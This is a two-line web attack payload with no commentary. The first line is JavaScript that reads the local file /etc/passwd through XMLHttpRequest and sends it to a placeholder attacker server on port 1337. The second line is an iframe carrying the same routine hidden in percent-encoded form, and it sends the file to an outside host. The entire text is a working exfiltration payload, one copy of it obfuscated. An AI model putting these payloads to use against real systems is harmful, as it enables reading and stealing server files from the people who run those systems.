x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();
<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>